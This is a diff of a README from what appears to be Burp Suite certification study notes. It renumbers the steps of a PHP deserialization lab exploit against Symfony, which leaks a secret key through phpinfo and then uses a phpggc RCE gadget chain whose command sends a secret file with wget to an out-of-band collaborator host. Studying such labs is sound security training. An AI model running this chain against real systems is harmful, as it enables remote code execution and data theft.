pjordann/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 >Exploit steps to perform a PHP deserialization with a pre-built gadget chain.

+1. Modify the cookie in the `my-account`.
+An Internal server Error is generated with the PHP framework and version ==> Symfony 4.3.6
-1. Request the ```/cgi-bin/phpinfo.php``` file to find the leaked ```SECRET_KEY``` information about the website.
+2. Request the ```/cgi-bin/phpinfo.php``` file to find the leaked ```SECRET_KEY``` information about the website.
-2. Generate a Base64-encoded serialized object that exploits an RCE gadget chain in Symfony ```phpggc Symfony/RCE4 exec 'wget http://OASTIFY.COM --post-file=/home/carlos/secret' | base64 -w 0```.
+3. Generate a Base64-encoded serialized object that exploits an RCE gadget chain in Symfony ```phpggc Symfony/RCE4 exec 'wget http://OASTIFY.COM --post-file=/home/carlos/secret' | base64 -w 0```.
-3. Construct a valid cookie containing this malicious object and sign it correctly using the secret key you obtained.
+4. Construct a valid cookie containing this malicious object and sign it correctly using the secret key you obtained.

 ```php
 <?php